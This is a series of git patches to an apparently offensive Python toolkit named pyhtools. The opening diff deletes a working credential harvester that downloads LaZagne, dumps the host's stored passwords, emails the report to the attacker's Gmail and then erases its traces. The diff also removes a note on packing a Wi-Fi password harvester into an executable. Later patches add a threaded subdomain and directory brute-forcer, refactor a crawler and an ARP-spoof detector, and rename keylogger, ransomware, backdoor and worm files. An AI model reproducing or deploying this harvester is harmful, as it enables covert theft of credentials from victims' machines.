dfile.write(response.content) - return True - except Exception as e: - print('[-] Exception : ', e) - return False - - -def run(email, password): - ''' - starts collecting data and report to specified email. - ''' - tmp_dir = tempfile.gettempdir() - os.chdir(tmp_dir) - # download LaZagne - download(r'https://github.com/AlessandroZ/LaZagne/releases/download/2.3.2/Windows.zip') - with zipfile.ZipFile('Windows.zip', 'r') as zip_file: - zip_file.extractall(tmp_dir) - - os.chdir('Windows') - recovered_report = subprocess.call('laZagne_x86.exe all') - print(recovered_report) - - report = subprocess.check_output('lazagne.exe all -vv') - msg = 'Subject: Credential Harvester Report.\n' + report - mail.send_mail_to(email, email, password, msg) - - # remove traces - cwd = os.getcwd() - for file in os.listdir(cwd): - file_dir = os.path.join(cwd,file) - os.remove(file_dir) - - os.chdir('..') - os.rmdir('Windows') - os.remove('Windows.zip') - - -if __name__ == '__main__': - run('youremail@gmail.com', 'yourpassword') - \ No newline at end of file diff --git a/pyhtools/malwares/downloader/downloader.py b/pyhtools/malwares/downloader/downloader.py deleted file mode 100644 index f1f29b2..0000000 --- a/pyhtools/malwares/downloader/downloader.py +++ /dev/null @@ -1,18 +0,0 @@ -import requests - -def download(url:str)->bool: - ''' - description: download and save file from the url. - params: url - returns: bool - ''' - try: - response = requests.get(url) - file_name = url.split('/')[-1] - with open(file_name, 'wb') as file: - file.write(response.content) - return True - - except Exception as e: - print('[-] Exception : ', e) - return False diff --git a/pyhtools/malwares/send_mail/how to.txt b/pyhtools/malwares/send_mail/how to.txt deleted file mode 100644 index 801d5d9..0000000 --- a/pyhtools/malwares/send_mail/how to.txt +++ /dev/null @@ -1,6 +0,0 @@ -refer this video tutorial: https://www.youtube.com/watch?v=ql5Dex4m40w - -Steps: -1. Turn on 2FA -2. Go to GoogleAcc->Security->AppPassword->Custom -3. Copy generated key and use that as password \ No newline at end of file diff --git a/pyhtools/malwares/send_mail/send_mail.py b/pyhtools/malwares/send_mail/send_mail.py deleted file mode 100644 index ea6915f..0000000 --- a/pyhtools/malwares/send_mail/send_mail.py +++ /dev/null @@ -1,33 +0,0 @@ -import smtplib - - -def send_mail_to(mail, receiver_mail: str , password, message)->bool: - ''' - sends mail to specific address/addresses. - ''' - try: - server = smtplib.SMTP('smtp.gmail.com', 587) - server.starttls() - server.login(mail, password) - server.sendmail(mail, receiver_mail, message) - server.quit() - return True - except smtplib.SMTPException as e: - print('[-] Exception : ', e) - return False - - -if __name__=='__main__': - msg = '''Subject: This is a test mail - Dear User, - This is a test message. - ''' - gmail = 'your@gmail.com' - password = 'password' - receivers = 'list of emails' - - # mail to self - send_mail_to(gmail, gmail, password, msg) - - # mail to others - send_mail_to(gmail, receivers, password, msg) diff --git a/pyhtools/malwares/wireless_password_harvester/HowToUse.txt b/pyhtools/malwares/wireless_password_harvester/HowToUse.txt deleted file mode 100644 index aecc52f..0000000 --- a/pyhtools/malwares/wireless_password_harvester/HowToUse.txt +++ /dev/null @@ -1,4 +0,0 @@ -HOW to use: -1. Update email id and password -2. Turn on less secure app: https://myaccount.google.com/lesssecureapps -3. Create exe: pyinstaller.exe --onefile --icon='icon_path' -n 'name_of_file' .\wireless_profile_harvestor.py \ No newline at end of file diff --git a/pyhtools/ransomwares/__init__.py b/pyhtools/ransomwares/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/pyhtools/ransomwares/dmsec/__init__.py b/pyhtools/ransomwares/dmsec/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/pyhtools/worms/__init__.py b/pyhtools/worms/__init__.py deleted file mode 100644 index e69de29..0000000 From cb5859c54e0196738db1a8c6c8afd3ca38da7f40 Mon Sep 17 00:00:00 2001 From: Dhrumil Mistry <56185972+dmdhrumilmistry@users.noreply.github.com> Date: Mon, 13 Jun 2022 18:18:33 +0530 Subject: [PATCH 3/5] use threads to discover dirs, files and subdomains rename websites to web rename Network to network --- pyhtools/attackers/Websites/crawler.py | 140 --------------- pyhtools/attackers/attackers.py | 32 ++-- .../attackers/{Websites => web}/__init__.py | 0 .../attackers/{Websites => web}/get_forms.py | 0 .../{Websites => web}/login_guesser.py | 0 .../attackers/{Websites => web}/spider.py | 0 .../{Websites => web}/vuln_scanner/README.md | 0 .../vuln_scanner/__init__.py | 0 .../{Websites => web}/vuln_scanner/scanner.py | 0 .../{Websites => web}/vuln_scanner/sqli.py | 0 .../{Websites => web}/vuln_scanner/test.txt | 0 .../vuln_scanner/vuln_scanner.py | 0 pyhtools/attackers/web/webdiscover.py | 161 ++++++++++++++++++ 13 files changed, 174 insertions(+), 159 deletions(-) delete mode 100644 pyhtools/attackers/Websites/crawler.py rename pyhtools/attackers/{Websites => web}/__init__.py (100%) rename pyhtools/attackers/{Websites => web}/get_forms.py (100%) rename pyhtools/attackers/{Websites => web}/login_guesser.py (100%) rename pyhtools/attackers/{Websites => web}/spider.py (100%) rename pyhtools/attackers/{Websites => web}/vuln_scanner/README.md (100%) rename pyhtools/attackers/{Websites => web}/vuln_scanner/__init__.py (100%) rename pyhtools/attackers/{Websites => web}/vuln_scanner/scanner.py (100%) rename pyhtools/attackers/{Websites => web}/vuln_scanner/sqli.py (100%) rename pyhtools/attackers/{Websites => web}/vuln_scanner/test.txt (100%) rename pyhtools/attackers/{Websites => web}/vuln_scanner/vuln_scanner.py (100%) create mode 100644 pyhtools/attackers/web/webdiscover.py diff --git a/pyhtools/attackers/Websites/crawler.py b/pyhtools/attackers/Websites/crawler.py deleted file mode 100644 index ee5ed79..0000000 --- a/pyhtools/attackers/Websites/crawler.py +++ /dev/null @@ -1,140 +0,0 @@ -import requests -import os -import argparse -import sys -from pyhtools.UI.colors import * - - -def get_args()->dict: - ''' - description: creates a ArgumentParser object collects - arguments and returns arguments as a dict - params: None - returns: dict - ''' - parser = argparse.ArgumentParser() - parser.add_argument('-t', '--target-domain', dest='target_domain', help='domain of your target eg. google.com, bing.com, facebook.com, etc.') - parser.add_argument('-w', '--wordlist', dest='wordlist', help='path to wordlist') - parser.add_argument('-m','--mode', dest='mode', help='modes : subdomain(find subdomains of the target domain), dirs(find directories of the target domain), subdir (find subdomain and directories of the target domain).') - - args = parser.parse_args() - del parser - - args_dict = { - 'mode' : args.mode, - 'wordlist' : args.wordlist, - 'target_domain':args.target_domain - } - - return args_dict - - -def request(url)->bool: - ''' - description: requests for specific url and - returns true if url is valid. - params : url(str) - returns : bool - ''' - try: - response = requests.get(url, timeout=0.5) - # print(url) - # print(response) - if response.status_code == 200: - return True - return False - except requests.exceptions.ConnectionError: - return False - except UnicodeError: - return False - except Exception as e: - print(BRIGHT_RED + '[-] Request Exception : ', e) - return False - - -def check_subdomain(domain:str, subdomain:str)->bool: - ''' - description: checks if subdomain exists under domain. - prints generated url and returns True if url is valid - params: subdomain(str), domain(str) - returns: bool - ''' - url = f'http://{subdomain}.{domain}' - # print(url) - if request(url): - print('[*] Valid Subdomain : ', url) - return True - else: - return False - - -def check_directories(domain:str, dir_name:str)->bool: - ''' - description: checks for directory for domain. - prints url and returns True if generated url is valid. - params: domain(str), dir_name(str) - returns : bool - ''' - url = f'http://{domain}/{dir_name}' - - if request(url): - print('[*] Valid Directory : ', url) - return True - else: - return False - - -def perform_function(func, wordlist:str, domain:str)->bool: - ''' - description: performs specific function on passed keyword arguements - params: func(function), **kwargs(keyword arguments) - returns: bool - ''' - try: - print(BRIGHT_WHITE + '[*] Loading wordlists...') - - print('='*25) - if os.path.isfile(wordlist): - with open(wordlist, 'r') as wordlist_file: - for word in wordlist_file: - word = word.strip() - # print(word) - func(domain, word) - else: - print(BRIGHT_RED + '[-] Wordlist Not Found.') - print('='*25) - print(BRIGHT_YELLOW + '[*] Process Completed.') - - except Exception as e: - print(BRIGHT_RED + '[-] Perform Exception : ', e) - print(BRIGHT_RED + '[!] Process Interrupted!') - - -# ========== Main =============== -if __name__ == '__main__': - print(BRIGHT_YELLOW + '[*] Starting crawler...') - - args = get_args() - # print(args) - - wordlist_file = r'{}'.format(args['wordlist']) - target_domain = args['target_domain'] - - try: - if args['mode'] == 'subdomain': - print(BRIGHT_YELLOW + '[1] Finding subdomains') - perform_function(check_subdomain, wordlist_file, target_domain) - elif args['mode'] == 'dirs': - print(BRIGHT_YELLOW + '[2] Finding directories and files') - perform_function(check_directories, wordlist_file, target_domain) - elif args['mode'] == 'subdirs': - print(BRIGHT_YELLOW + '[1] Finding subdomains') - perform_function(check_subdomain, wordlist_file, target_domain) - - print(BRIGHT_YELLOW + '[2] Finding directories and files') - perform_function(check_directories, wordlist_file, target_domain) - else: - print(BRIGHT_RED + '[-] Unkown mode: use --help or -h for help') - except KeyboardInterrupt: - print('[!] ctrl+c detected! Exiting Program..') - sys.exit() \ No newline at end of file diff --git a/pyhtools/attackers/attackers.py b/pyhtools/attackers/attackers.py index a58b9fd..a04c760 100644 --- a/pyhtools/attackers/attackers.py +++ b/pyhtools/attackers/attackers.py @@ -1,13 +1,13 @@ import json -import pyhtools.attackers.Network.arpspoofer as arp -import pyhtools.attackers.Network.nwscan as nwscan -import pyhtools.attackers.Network.machngr as machngr -import pyhtools.attackers.Websites.login_guesser as web_login -import pyhtools.attackers.Websites.spider as spider -import pyhtools.attackers.Websites.crawler as crawler +import pyhtools.attackers.network.arpspoofer as arp +import pyhtools.attackers.network.nwscan as nwscan +import pyhtools.attackers.network.machngr as machngr +import pyhtools.attackers.web.login_guesser as web_login +import pyhtools.attackers.web.spider as spider from pyhtools.UI.colors import * -from pyhtools.attackers.Websites.vuln_scanner.scanner import Scanner +from pyhtools.attackers.web.vuln_scanner.scanner import Scanner +from pyhtools.attackers.web.webdiscover import Discoverer # NETWORK ATTACKS @@ -34,7 +34,7 @@ def nw_scan(): params: None returns: None ''' - ip_range = input('[+] IP RANGE : ') + ip_range = input('[+] IP (192.168.10.1/24): ') nwscan.run_nwscan(ip_range) @@ -123,10 +123,9 @@ def webcrawldirs(): params: None returns: None ''' - target_url = input('[+] TARGET URL : ') - wordlist_path = input('[+] WORDLIST PATH : ') - crawler.perform_function(crawler.check_directories, - wordlist_path, target_url) + domain = input('[+] DOMAIN (duckduckgo.com): ') + wordlist_path = input('[+] WORDLIST PATH: ') + Discoverer.check_dirs(domain=domain, wordlist=wordlist_path) def webcrawlsubdom(): @@ -135,11 +134,6 @@ def webcrawlsubdom(): params: None returns: None ''' - target_url = input('[+] TARGET URL : ') + domain = input('[+] DOMAIN (duckduckgo.com) : ') wordlist_path = input('[+] WORDLIST PATH : ') - crawler.perform_function(crawler.check_subdomain, - wordlist_path, target_url) - - -if __name__ == "__main__": - print('[*] Attackers module!. Exiting...') + Discoverer.check_subdomains(domain=domain, wordlist=wordlist_path) diff --git a/pyhtools/attackers/Websites/__init__.py b/pyhtools/attackers/web/__init__.py similarity index 100% rename from pyhtools/attackers/Websites/__init__.py rename to pyhtools/attackers/web/__init__.py diff --git a/pyhtools/attackers/Websites/get_forms.py b/pyhtools/attackers/web/get_forms.py similarity index 100% rename from pyhtools/attackers/Websites/get_forms.py rename to pyhtools/attackers/web/get_forms.py diff --git a/pyhtools/attackers/Websites/login_guesser.py b/pyhtools/attackers/web/login_guesser.py similarity index 100% rename from pyhtools/attackers/Websites/login_guesser.py rename to pyhtools/attackers/web/login_guesser.py diff --git a/pyhtools/attackers/Websites/spider.py b/pyhtools/attackers/web/spider.py similarity index 100% rename from pyhtools/attackers/Websites/spider.py rename to pyhtools/attackers/web/spider.py diff --git a/pyhtools/attackers/Websites/vuln_scanner/README.md b/pyhtools/attackers/web/vuln_scanner/README.md similarity index 100% rename from pyhtools/attackers/Websites/vuln_scanner/README.md rename to pyhtools/attackers/web/vuln_scanner/README.md diff --git a/pyhtools/attackers/Websites/vuln_scanner/__init__.py b/pyhtools/attackers/web/vuln_scanner/__init__.py similarity index 100% rename from pyhtools/attackers/Websites/vuln_scanner/__init__.py rename to pyhtools/attackers/web/vuln_scanner/__init__.py diff --git a/pyhtools/attackers/Websites/vuln_scanner/scanner.py b/pyhtools/attackers/web/vuln_scanner/scanner.py similarity index 100% rename from pyhtools/attackers/Websites/vuln_scanner/scanner.py rename to pyhtools/attackers/web/vuln_scanner/scanner.py diff --git a/pyhtools/attackers/Websites/vuln_scanner/sqli.py b/pyhtools/attackers/web/vuln_scanner/sqli.py similarity index 100% rename from pyhtools/attackers/Websites/vuln_scanner/sqli.py rename to pyhtools/attackers/web/vuln_scanner/sqli.py diff --git a/pyhtools/attackers/Websites/vuln_scanner/test.txt b/pyhtools/attackers/web/vuln_scanner/test.txt similarity index 100% rename from pyhtools/attackers/Websites/vuln_scanner/test.txt rename to pyhtools/attackers/web/vuln_scanner/test.txt diff --git a/pyhtools/attackers/Websites/vuln_scanner/vuln_scanner.py b/pyhtools/attackers/web/vuln_scanner/vuln_scanner.py similarity index 100% rename from pyhtools/attackers/Websites/vuln_scanner/vuln_scanner.py rename to pyhtools/attackers/web/vuln_scanner/vuln_scanner.py diff --git a/pyhtools/attackers/web/webdiscover.py b/pyhtools/attackers/web/webdiscover.py new file mode 100644 index 0000000..86b2d33 --- /dev/null +++ b/pyhtools/attackers/web/webdiscover.py @@ -0,0 +1,161 @@ +import argparse +import os +import sys +import requests + + +from pyhtools.UI.colors import * +from threading import Thread + + +class Discoverer: + ''' + helps to discover directories, files and subdomains + ''' + @staticmethod + def request(url, valid_status_codes: list[int] = None) -> bool: + ''' + description: requests for specific url and + returns true if url is valid. + params : url(str), status_codes list[int] + returns : bool + ''' + if not valid_status_codes: + status_codes = [200, 204, 301, 302, 307, 401] + + try: + response = requests.get(url, timeout=0.5) + if response.status_code in status_codes: + return True + return False + except Exception as e: + # print(f'{BRIGHT_RED}[-] Request Exception: {e}') + return False + + @staticmethod + def __check_subdomain(domain: str, subdomain: str) -> bool: + ''' + description: checks if subdomain exists under domain. + prints generated url and returns True if url is valid + params: subdomain(str), domain(str) + returns: bool + ''' + url = f'http://{subdomain}.{domain}' + + if Discoverer.request(url): + print(f'[\u2713] {url}') + return True + else: + return False + + @staticmethod + def __check_directory(domain: str, dir_name: str) -> bool: + ''' + description: checks for directory for domain. + prints url and returns True if generated url is valid. + params: domain(str), dir_name(str) + returns : bool + ''' + url = f'http://{domain}/{dir_name}' + if Discoverer.request(url): + print(f'[\u2713] {url}') + return True + else: + return False + + @staticmethod + def check_dirs(domain: str, wordlist: str, ): + return Discoverer.__perform_function( + func=Discoverer.__check_directory, + wordlist=wordlist, + domain=domain + ) + + @staticmethod + def check_subdomains(domain: str, wordlist: str): + return Discoverer.__perform_function( + func=Discoverer.__check_subdomain, + wordlist=wordlist, + domain=domain + ) + + @staticmethod + def __perform_function(func, wordlist: str, domain: str, threads: int = 5) -> bool: + ''' + description: performs specific function on passed keyword arguements + params: func(function), **kwargs(keyword arguments) + returns: bool + ''' + # if file does not exists return False + if not os.path.isfile(wordlist): + return False + + # load wordlists into a list + words = [''] + with open(wordlist, 'r') as wordlist_file: + words = wordlist_file.readlines() + + # sanitize list + words = [word.strip() for word in words] + + # function to manage thread + def manage_thread(): + while len(words) != 0: + word = words[0] + func(domain, word) + words.pop(0) + + # create threads list + threads_list:list[Thread] = [] + + for _ in range(threads): + thread = Thread(target=manage_thread) + threads_list.append(thread) + + # start threads + for thread in threads_list: + thread.start() + + # stop threads + for thread in threads_list: + thread.join() + + return True + + +if __name__ == '__main__': + + parser = argparse.ArgumentParser(prog='webdiscover') + parser.add_argument('-t', '--target-domain', dest='target_domain', + help='domain of your target eg. google.com, bing.com, facebook.com, etc.', required=True) + parser.add_argument('-w', '--wordlist', dest='wordlist', + help='path to wordlist', required=True) + parser.add_argument('-m', '--mode', dest='mode', + help='modes : subdom(find subdomains of the target domain), dir(find directories of the target domain). default mode is `dir`', default='dir') + + args = parser.parse_args() + target_domain = args.target_domain + wordlist_file = args.wordlist + mode = args.mode + + try: + if mode == 'subdom': + print(f'{BRIGHT_YELLOW}[1] Finding subdomains') + Discoverer.check_subdomains( + domain=target_domain, + wordlist=wordlist_file + ) + + elif mode == 'dir': + print(f'{BRIGHT_YELLOW}[2] Finding directories and files') + Discoverer.check_dirs( + domain=target_domain, + wordlist=wordlist_file, + ) + + else: + print(f'{BRIGHT_RED}[!] invalid mode. Use -h tag to print help.') + + except KeyboardInterrupt or EOFError: + print('[!] User Interrupted!') + sys.exit() From 9c88f425cc8c2409773559ee3994e0848e51e964 Mon Sep 17 00:00:00 2001 From: Dhrumil Mistry <56185972+dmdhrumilmistry@users.noreply.github.com> Date: Mon, 13 Jun 2022 21:29:42 +0530 Subject: [PATCH 4/5] update spider module --- pyhtools/attackers/attackers.py | 11 ++++- pyhtools/attackers/web/spider.py | 69 ++++++++++++++++---------------- 2 files changed, 43 insertions(+), 37 deletions(-) diff --git a/pyhtools/attackers/attackers.py b/pyhtools/attackers/attackers.py index a04c760..51a0581 100644 --- a/pyhtools/attackers/attackers.py +++ b/pyhtools/attackers/attackers.py @@ -3,10 +3,10 @@ import pyhtools.attackers.network.nwscan as nwscan import pyhtools.attackers.network.machngr as machngr import pyhtools.attackers.web.login_guesser as web_login -import pyhtools.attackers.web.spider as spider from pyhtools.UI.colors import * from pyhtools.attackers.web.vuln_scanner.scanner import Scanner +from pyhtools.attackers.web.spider import Spider from pyhtools.attackers.web.webdiscover import Discoverer @@ -114,7 +114,14 @@ def webspider(): returns: None ''' target_url = input('[+] TARGET URL : ') - spider.start_spider(target_url) + spider = Spider() + + print(f'{BRIGHT_YELLOW}[*] Starting Spider... Press Ctrl+C to interrupt') + discovered_links = spider.start( + target_url=target_url, + print_links=True + ) + print(f'[*] Total Links Found: {len(discovered_links)}') def webcrawldirs(): diff --git a/pyhtools/attackers/web/spider.py b/pyhtools/attackers/web/spider.py index 0f63ed3..f23ef7a 100644 --- a/pyhtools/attackers/web/spider.py +++ b/pyhtools/attackers/web/spider.py @@ -1,22 +1,18 @@ -#!usr/bin/env python3 -from os import name import requests import re -from urllib.parse import urljoin import argparse -from pyhtools.UI.colors import * +from urllib.parse import urljoin +from pyhtools.UI.colors import * -# list to save links on the whole webpage -# to avoid repetition -target_links = [] -def start_spider(target_url): - ''' - description: starts spider - ''' +class Spider: + def __init__(self) -> None: + # list to save links on the whole webpage + # to avoid repetition + self.target_links = [] - def get_links(url:str)->list: + def get_links(self, url: str) -> list: ''' description: extracts links from the whole webpage. params: url(str) of the webpage @@ -24,49 +20,52 @@ def get_links(url:str)->list: ''' response = requests.get(url) content = str(response.content) - return re.findall(r'(?:href=")(.*?)"',content) - + return re.findall(r'(?:href=")(.*?)"', content) - def get_target_links(url:str): + def get_target_links(self, url: str, print_link: bool = True): ''' description: extracts useful links and prints them which are only related to the target webpage. params: links(list) from the target webpage returns: useful links(list) related to target webpage ''' - global target_links - links = get_links(url) + target_links = self.target_links + links = self.get_links(url) + for link in links: link = urljoin(url, link) if '#' in link: link = link.split('#')[0] - # print(BRIGHT_RED+ link) - if link not in target_links and target_url in link: + if link not in target_links and url in link: target_links.append(link) - print(link) - get_target_links(link) + if print_link: + print(link) + self.get_target_links(url=link, print_link=print_link) + + def start(self, target_url:str, print_links: bool = True): + ''' + description: starts spider + ''' + # try: + self.get_target_links(target_url, print_links) + + # except Exception as e: + # print(f'{BRIGHT_RED}[!] Exception: {e}') - try: - print(BRIGHT_YELLOW + '[*] Starting SPIDER...') - get_target_links(target_url) - print(BRIGHT_YELLOW + f'[*] Mapped all links found on {target_url}') - print(BRIGHT_YELLOW + "[*] Total Links Found : ", len(target_links)) - except KeyboardInterrupt: - print(BRIGHT_YELLOW + '\r[!] ctrl+c detected! Exiting Spider.') - except Exception as e: - print(BRIGHT_RED + '[-] Exception : ', e) - finally: - print(BRIGHT_YELLOW + "[*] Total Links Found Before Exception : ", len(target_links)) + # finally: + return self.target_links if __name__ == '__main__': # Parse arguments parser = argparse.ArgumentParser() - parser.add_argument('-t', '--target', dest='target_url', help='url of the target eg: https://facebook.com, https://github.com, http://bing.com') + parser.add_argument('-t', '--target', dest='target_url', required=True, + help='url of the target eg: https://facebook.com, https://github.com, http://bing.com') args = parser.parse_args() - del parser target_url = args.target_url - start_spider(target_url) \ No newline at end of file + spider = Spider() + discovered_links = spider.start(target_url=target_url, print_links=True) + print(f'[*] Total Links Found: {len(discovered_links)}') From f3c41e1895a3f40b60d3ffc053550757ad8bb178 Mon Sep 17 00:00:00 2001 From: Dhrumil Mistry <56185972+dmdhrumilmistry@users.noreply.github.com> Date: Mon, 13 Jun 2022 22:48:31 +0530 Subject: [PATCH 5/5] create class for ARP spoof Detector refactor examples into folders --- examples/Detectors/ARP-SpoofDetector.py | 13 +++ .../Malwares/TelegramBackdoor.py | 0 .../Malwares/TelegramDataHarvester.py | 0 .../{ => EvilFiles}/Malwares/key_logger.py | 0 .../Malwares/wifi-password-harvester.py | 0 .../Ransomwares/dmsec_decrypter.py | 0 .../Ransomwares/dmsec_encrypter.py | 0 .../{ => EvilFiles}/Worms/DirClonerWorm.py | 0 pyhtools/detectors/arp_spoof_detector.py | 88 +++++++++---------- 9 files changed, 57 insertions(+), 44 deletions(-) create mode 100644 examples/Detectors/ARP-SpoofDetector.py rename examples/{ => EvilFiles}/Malwares/TelegramBackdoor.py (100%) rename examples/{ => EvilFiles}/Malwares/TelegramDataHarvester.py (100%) rename examples/{ => EvilFiles}/Malwares/key_logger.py (100%) rename examples/{ => EvilFiles}/Malwares/wifi-password-harvester.py (100%) rename examples/{ => EvilFiles}/Ransomwares/dmsec_decrypter.py (100%) rename examples/{ => EvilFiles}/Ransomwares/dmsec_encrypter.py (100%) rename examples/{ => EvilFiles}/Worms/DirClonerWorm.py (100%) diff --git a/examples/Detectors/ARP-SpoofDetector.py b/examples/Detectors/ARP-SpoofDetector.py new file mode 100644 index 0000000..2acd221 --- /dev/null +++ b/examples/Detectors/ARP-SpoofDetector.py @@ -0,0 +1,13 @@ +from argparse import ArgumentParser +from pyhtools.detectors.arp_spoof_detector import SpoofDetector + +parser = ArgumentParser() +parser.add_argument('-i', '--interface', dest='interface', + help='checks for specific interface') + +args = parser.parse_args() +interface = args.interface + +# Create spoof detector obj +detector = SpoofDetector(interface) +detector.capture_packets() diff --git a/examples/Malwares/TelegramBackdoor.py b/examples/EvilFiles/Malwares/TelegramBackdoor.py similarity index 100% rename from examples/Malwares/TelegramBackdoor.py rename to examples/EvilFiles/Malwares/TelegramBackdoor.py diff --git a/examples/Malwares/TelegramDataHarvester.py b/examples/EvilFiles/Malwares/TelegramDataHarvester.py similarity index 100% rename from examples/Malwares/TelegramDataHarvester.py rename to examples/EvilFiles/Malwares/TelegramDataHarvester.py diff --git a/examples/Malwares/key_logger.py b/examples/EvilFiles/Malwares/key_logger.py similarity index 100% rename from examples/Malwares/key_logger.py rename to examples/EvilFiles/Malwares/key_logger.py diff --git a/examples/Malwares/wifi-password-harvester.py b/examples/EvilFiles/Malwares/wifi-password-harvester.py similarity index 100% rename from examples/Malwares/wifi-password-harvester.py rename to examples/EvilFiles/Malwares/wifi-password-harvester.py diff --git a/examples/Ransomwares/dmsec_decrypter.py b/examples/EvilFiles/Ransomwares/dmsec_decrypter.py similarity index 100% rename from examples/Ransomwares/dmsec_decrypter.py rename to examples/EvilFiles/Ransomwares/dmsec_decrypter.py diff --git a/examples/Ransomwares/dmsec_encrypter.py b/examples/EvilFiles/Ransomwares/dmsec_encrypter.py similarity index 100% rename from examples/Ransomwares/dmsec_encrypter.py rename to examples/EvilFiles/Ransomwares/dmsec_encrypter.py diff --git a/examples/Worms/DirClonerWorm.py b/examples/EvilFiles/Worms/DirClonerWorm.py similarity index 100% rename from examples/Worms/DirClonerWorm.py rename to examples/EvilFiles/Worms/DirClonerWorm.py diff --git a/pyhtools/detectors/arp_spoof_detector.py b/pyhtools/detectors/arp_spoof_detector.py index ae0c94b..211596c 100644 --- a/pyhtools/detectors/arp_spoof_detector.py +++ b/pyhtools/detectors/arp_spoof_detector.py @@ -1,56 +1,56 @@ -#!usr/bin/env python3 -import argparse import scapy.all as sp +from argparse import ArgumentParser -def get_args(): + +class SpoofDetector: ''' - get arguments if any + ARP spoofer to perform Local MITM attacks ''' - parser = argparse.ArgumentParser() - parser.add_argument('-i', '--interface', dest='interface', help='checks for specific interface') - - args = parser.parse_args() - interface = args.interface - del parser - del args - - return interface + def __init__(self, interface: str) -> None: + self.interface = interface -def get_mac(ip:str): - ''' - returns mac address of the ip - ''' - arp_req = sp.ARP(pdst=ip) - brdcst = sp.Ether(dst='ff:ff:ff:ff:ff:ff') + def get_mac(self, ip: str): + ''' + returns mac address of the ip + ''' + arp_req = sp.ARP(pdst=ip) + brdcst = sp.Ether(dst='ff:ff:ff:ff:ff:ff') - packet = brdcst / arp_req - responded_list = sp.srp(packet, timeout = 1, verbose = False)[0] + packet = brdcst / arp_req + responded_list = sp.srp(packet, timeout=1, verbose=False)[0] - return responded_list[0][1].hwsrc + return responded_list[0][1].hwsrc + def check_spoof(self, packet) -> bool: + ''' + checks if machine is under ARP/MITM attack. + ''' + if packet.haslayer(sp.ARP) and packet[sp.ARP].op == 2: + try: + real_mac = self.get_mac(packet[sp.ARP].psrc) + response_mac = packet[sp.ARP].hwsrc + if real_mac != response_mac: + print( + f"[!] ARP Spoof Detected! {response_mac} is imposter. {response_mac} is spoofing as {real_mac}") + except IndexError: + pass + + def start(self): + ''' + captures and processes packets to check whether network is being attacked or not + ''' + sp.sniff(iface=self.interface, store=False, prn=self.check_spoof) -def check_spoof(packet)->bool: - ''' - checks if machine is under ARP/MITM attack. - ''' - - if packet.haslayer(sp.ARP) and packet[sp.ARP].op == 2: - try: - real_mac = get_mac(packet[sp.ARP].psrc) - response_mac = packet[sp.ARP].hwsrc - if real_mac != response_mac: - print(f"[!] ARP Spoof Detected! {response_mac} is imposter. {response_mac} is spoofing as {real_mac}") - except IndexError: - pass - - -def capture_packets(iface:str): - ''' - captures and processes captured packets. - ''' - sp.sniff(iface=iface, store=False, prn=check_spoof) +if __name__ == '__main__': + parser = ArgumentParser() + parser.add_argument('-i', '--interface', dest='interface', + help='checks for specific interface') + + args = parser.parse_args() + interface = args.interface -INTERFACE = get_args() -capture_packets(INTERFACE) \ No newline at end of file + # Create spoof detector obj and start process + detector = SpoofDetector(interface) + detector.start()